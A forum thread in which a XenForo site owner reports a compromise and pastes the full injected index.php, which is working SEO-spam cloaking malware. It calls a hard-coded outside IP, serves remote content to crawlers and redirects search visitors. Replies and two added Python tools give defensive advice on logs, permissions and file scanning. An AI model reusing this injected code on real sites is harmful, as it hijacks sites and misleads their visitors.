XenForo 2.1.12 Released Full | XenForo 2.1 ENXF


DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
29
Points
13

Reputation:

I'm running 2.1.3, got hacked today :cry:
 

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,529
Points
523

Reputation:

DRIVER1ksa please give more details on it.
Did you find something in the logs of the web server? How did you recognize that you are hacked?

What else is installed on the server?
 

DRIVER1ksa

BattleKing this file

Code:
<?php $inter_domain='http://204.12.224.242/z0222_2/';function stp(){ return exit; } func...
 

Attachments

  • good.zip
    1.7 KB · Views: 181

DRIVER1ksa

BattleKing also the whole log file is like this, 500 lines

Code:
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:47 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:07:31 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:30:25 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:31:27 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:37:44 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
 

BattleKing

DRIVER1ksa this does not look like a hack.
 

DRIVER1ksa


Now I upgraded to 2.1.12

everything seems to work fine

thank you all
 

BattleKing

DRIVER1ksa You upgraded now, but why does this solve your issue?
Because all index files are back?
If you are hacked, then you might still be hacked! So please check carefully what is installed on your server, check created users, check files ...
 

DRIVER1ksa

BattleKing the good.php file does not exist in any of my 10+ backup files, I definitely didn't put it there. In the file you can clearly see the IP address and user which belong to the hacker, I guess.

Also I re-uploaded all the files in public_html, that made the website work again,
but I can't click or use settings in the admin page, the only solution to fix it is to upgrade.

Also sorry I didn't mention it before, this is the XenForo index.php file

PHP:
<?php $inter_domain='http://204.12.194.2/z0223_2/';function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){$robots_cont = 
getServerCont11($url_robots,$data1);define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont11($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} $data1['action']="check_words"; $check1= 
getServerCont11($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont11($url_words,$data1);header("Content-type:text/xml");echo $check_url4;stp();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if($chk_refer && (preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER['REQUEST_URI'])))))){echo getServerCont11($jump1,$data1);stp(); } $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if($res_crawl){ $data1['http_user_agent']=$user_agent;$get_content = getServerCont11($indata1,$data1); echo $get_content;stp(); } ?>

Why does it look like this?

It should be

PHP:
<?php

$phpVersion = phpversion();
if (version_compare($phpVersion, '5.6.0', '<'))
{
    die("PHP 5.6.0 or newer is required. $phpVersion does not meet this requirement. Please ask your host to upgrade PHP.");
}

$dir = __DIR__;
require($dir . '/src/XF.php');

XF::start($dir);

if (\XF::requestUrlMatchesApi())
{
    \XF::runApp('XF\Api\App');
}
else
{
    \XF::runApp('XF\Pub\App');
}
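
The "Only variables should be passed by reference" notice in the error_log lines posted earlier in the thread is what PHP 7 emits for the `end(explode(...))` call in the injected file, and the stock index.php has nothing but `<?php` on line 1. The following added example (not code from the thread or from XenForo) groups such log entries to show when each one was first and last seen; the sample log, its placeholder path and the line-1 heuristic are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the format of the error_log lines quoted in the thread;
# /home/example/public_html is a placeholder path.
SAMPLE_LOG = """\
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/example/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/example/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/example/public_html/index.php on line 1
[28-Feb-2023 08:01:00 UTC] PHP Warning:  Undefined variable $x in /home/example/public_html/src/addons/Demo/Foo.php on line 12
not a php log line
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \S+\] "
    r"PHP (?P<level>[A-Za-z ]+):\s+(?P<msg>.*) in (?P<file>/\S+) on line (?P<line>\d+)$")

def timeline(log_text):
    """Group PHP error_log entries by (file, line, message): count, first and last seen."""
    groups = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # stack traces and non-PHP lines are skipped
        # Timestamps stay in the log's own time zone (UTC in the thread's log).
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
        groups[(m["file"], int(m["line"]), m["msg"])].append(ts)
    return {k: {"count": len(v), "first": min(v), "last": max(v)} for k, v in groups.items()}

def on_line_one(summary):
    """Heuristic for this case: messages raised on line 1, where a stock script has only '<?php'."""
    return {k: v for k, v in summary.items() if k[1] == 1}

if __name__ == "__main__":
    for (path, line, msg), info in on_line_one(timeline(SAMPLE_LOG)).items():
        print(path, line, msg, info["count"], info["first"], info["last"])
```

The earliest "first seen" value only bounds when the modified file was already being executed; the log may have been rotated or started later than the change itself.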
 

SNap!

Collaborate
Collaborate
Registered
Joined
Mar 17, 2022
Messages
560
Points
253

Reputation:

seems some files are writeable on host. check permissions
 

DRIVER1ksa

SNap! when I logged into my cPanel I noticed in the "Last Modified" column that a PHP file was edited yesterday! But I had not logged in to my cPanel for more than one month.

I contacted my web host, they say only my website is affected,
the shared server and other websites are just fine!
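
The checks suggested in the replies above (look at the files, check permissions, look at modification times) can be combined into one triage pass. This is an added example, not code from the thread or from XenForo: it walks a web root and flags PHP files that show traits of the injected index.php posted here, are group- or world-writable, or changed recently. The sample files, the 192.0.2.10 address, the indicator names and the 7-day window are constructed assumptions.

```python
import os
import re
import stat
import tempfile
import time
from pathlib import Path

# Traits of the injected index.php quoted in this thread (heuristics, not signatures).
INDICATORS = {
    "hard-coded IP URL": re.compile(rb"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    "crawler list in regex": re.compile(rb"googlebot\s*\|", re.I),
    "outbound curl": re.compile(rb"curl_exec\s*\("),
    "TLS verification disabled": re.compile(rb"CURLOPT_SSL_VERIFYPEER\s*,\s*(?:FALSE|0)\b", re.I),
}

def scan_tree(root, recent_days=7):
    """Map relative path -> findings for each flagged .php file under root."""
    root, report = Path(root), {}
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        st, data = path.stat(), path.read_bytes()
        found = [name for name, rx in INDICATORS.items() if rx.search(data)]
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            found.append("group/world-writable")
        if time.time() - st.st_mtime < recent_days * 86400:
            found.append("recently modified")
        if found:
            report[str(path.relative_to(root))] = found
    return report

# Constructed samples; 192.0.2.10 is a documentation address, not an indicator.
INJECTED = (b"<?php $inter_domain='http://192.0.2.10/x/';$bots='googlebot|google';"
            b"curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);$o=curl_exec($ch); ?>")
STOCK = b"<?php\n$dir = __DIR__;\nrequire($dir . '/src/XF.php');\nXF::start($dir);\n"

def demo():
    """Scan a temporary web root holding one injected-style and one stock-style file."""
    old = time.time() - 90 * 86400  # make the stock file look three months old
    with tempfile.TemporaryDirectory() as tmp:
        for name, body, mode in (("index.php", INJECTED, 0o666), ("admin.php", STOCK, 0o644)):
            path = Path(tmp, name)
            path.write_bytes(body)
            path.chmod(mode)
            if body is STOCK:
                os.utime(path, (old, old))
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

Right after a re-upload or upgrade every file is "recently modified", so that finding is most useful when run against a tree that has been untouched for longer than the window.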
 